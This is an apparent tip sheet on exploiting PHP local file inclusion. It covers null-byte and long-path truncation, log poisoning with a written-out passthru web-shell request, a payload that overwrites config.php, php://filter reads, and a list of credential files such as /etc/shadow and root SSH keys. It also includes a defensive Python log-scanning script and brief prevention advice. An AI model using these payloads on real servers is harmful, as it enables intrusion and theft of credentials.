LFI Usage Tips


Conditions for exploiting an include that appends a fixed suffix to the filename:

(1) magic_quotes_gpc = off; otherwise %00 is escaped and becomes \0.

(2) PHP < 5.3.4. I did not get it to work on 5.4.4; see CVE-2006-7243 for details.

The included file must be readable: the Apache user needs at least read permission on it.

Truncation methods:

(1) %00, with magic_quotes_gpc = off.

(2) Long filename: on Linux PHP truncates paths longer than 4096 bytes (I did not reproduce this on 5.2.8); on Windows the limit is 259 bytes (not attempted). This is independent of magic_quotes_gpc. On Linux use a path of the form ../../../../etc/passwd/./././././././ (padded out past the limit); on Windows use ..., which a commenter below reported as working, or the same form as on Linux.

Tips on which files to include:

1. Uploaded files, such as images or documents.

2. The data:// and php://input pseudo-protocols (wrappers); these require allow_url_include = On.

3. Log files, such as access.log. Send the request with nc so that the header is written raw and the spaces are not encoded as %20:

[email protected]:/var/log/apache2# nc 127.0.0.1 80

GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

The entries in access.log then look like this (the first line is the shell prompt that was pasted into nc by mistake):

127.0.0.1 - - [09/Apr/2015:03:53:21 -0400] "[email protected]:/var/log/apache2# nc -h" 400 582 "-" "-"

127.0.0.1 - - [09/Apr/2015:03:53:45 -0400] "GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1" 404 480 "-" "-"

Then include the log directly. If the log is large, you can instead use a one-liner that writes a file, so that you only need to execute it once to get a shell. For example:

<?php $fp = fopen("/homeirtual/www.xxx.com/forum/config.php", "w+"); fputs($fp, "<?php echo 'hacked'; ?>"); fclose($fp); ?>

4. /proc/self/environ, with a modified User-Agent.

(1) In about:config add general.useragent.override with the value <?php phpinfo(); ?>, or use a user-agent switcher extension.

In my tests either there was no permission to read the file, or the User-Agent field did not appear in it.

5. Session files.

6. Other files created by PHP.

A cleaner way to read files out:

https://10.20.30.50/fi?file=php://filter/read=convert.base64-encode/resource=../../../../../etc/passwd%00

Test whether a directory exists (the path only resolves if dossierexistant is really there):

../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
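Every request shown above (the log-poisoning request, the php://filter read and the traversal probes) passes through the web server's access log, which is where a defender can see them. As an added example that is not part of the original post, the following Python scans combined-format log lines for those indicators. The entries in SAMPLE_LOG are constructed for the example (the first mirrors the poisoned entry quoted above), and the function and pattern names are my own. The request, referer and user-agent are decoded twice so double URL-encoding does not hide the markers; the scan flags traversal sequences, NUL bytes, stream wrappers, PHP open tags (the poisoning payload, whether in the URL or in the User-Agent) and request paths long enough to reach the 4096-byte truncation limit mentioned earlier.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache combined log format, matching the entries quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Markers of the LFI techniques discussed on this page. Pattern names are my own.
INDICATORS = {
    "traversal": re.compile(r"\.\.[/\\]"),                   # ../ or ..\
    "null_byte": re.compile(r"\x00"),                        # %00 after decoding
    "php_wrapper": re.compile(r"\b(?:php|data|expect|phar)://", re.I),
    "php_tag": re.compile(r"<\?(?:php\b|=)", re.I),          # poisoning payload
    "proc_environ": re.compile(r"/proc/self/environ", re.I),
}
PATH_MAX = 4096  # Linux limit past which PHP truncated the path (see above)

# Constructed sample log; the first entry mirrors the poisoned request shown above.
SAMPLE_LOG: List[str] = [
    '127.0.0.1 - - [09/Apr/2015:03:53:45 -0400] '
    '"GET /<?php passthru($_GET[\'cmd\']);?> HTTP/1.1" 404 480 "-" "-"',
    '10.0.0.7 - - [09/Apr/2015:04:01:02 -0400] '
    '"GET /fi?file=php://filter/read=convert.base64-encode/resource='
    '../../../../../etc/passwd%00 HTTP/1.1" 200 1821 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [09/Apr/2015:04:02:10 -0400] '
    '"GET /index.php?page=home HTTP/1.1" 200 5120 "-" "<?php phpinfo(); ?>"',
    '192.0.2.5 - - [09/Apr/2015:04:03:00 -0400] '
    '"GET /index.php?page=about HTTP/1.1" 200 4096 "http://example.com/" "Mozilla/5.0"',
    '198.51.100.3 - - [09/Apr/2015:04:05:00 -0400] '
    '"GET /fi?file=../../../../etc/passwd' + "/." * 2100 + ' HTTP/1.1" 500 0 "-" "-"',
]


def decode(value: str) -> str:
    """Decode URL encoding twice so %252e%252e%252f (double encoding) is unmasked."""
    return unquote(unquote(value))


def request_path(request: str) -> str:
    """Pull the target out of 'METHOD target HTTP/x.y'; fall back to the whole line."""
    parts = request.split(" ")
    return parts[1] if len(parts) >= 2 else request


def classify(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line; return its fields plus a sorted list of indicator names."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # not in combined format: leave for another parser
    fields = m.groupdict()
    hits = set()
    # The request line, the referer and the user-agent are exactly the fields an
    # attacker controls when poisoning a log, so all three are inspected.
    for field in ("request", "referer", "ua"):
        text = decode(fields[field])
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    # A path padded out to PATH_MAX is the long-filename truncation attempt.
    if len(decode(request_path(fields["request"]))) >= PATH_MAX:
        hits.add("long_path")
    return {"ip": fields["ip"], "ts": fields["ts"],
            "request": fields["request"], "indicators": sorted(hits)}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only the entries that carry at least one indicator."""
    results = []
    for line in lines:
        entry = classify(line)
        if entry and entry["indicators"]:
            results.append(entry)
    return results


if __name__ == "__main__":
    for entry in scan(SAMPLE_LOG):
        print(entry["ip"], entry["ts"], entry["indicators"])
```

Running the block over SAMPLE_LOG reports four of the five entries; the plain page=about request with a normal browser user-agent is the only one with no indicators. Note that the indicators are deliberately broad: a benign request containing ".." in a query string will be flagged, so the output is a triage list, not a verdict.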

Files worth reading through directory traversal (read permission required):

/var/lib/locate.db

/var/lib/mlocate/mlocate.db

/usr/local/apache2/conf/httpd.conf

These require root privileges:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/[0-9]* (file descriptors)

/proc/mounts

/proc/config.gz

How to prevent it:

(1) Enable magic_quotes_gpc.

(2) Restrict which directories can be read.

(3) Best of all, do not include files dynamically at all.

file_exists, move_uploaded_file and file_get_contents are affected in the same way.

Remote file inclusion:

(1) Requires allow_url_include = On and allow_url_fopen = On.

(2) Truncation can be used here as well.

The php:// wrapper can be used to read a file's contents, so a PHP file can be read out as source instead of being executed; otherwise an included PHP file is executed.

Reference:

http://www.joychou.org/index.php/web/truncated.html

https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

http://drops.wooyun.org/tips/3827

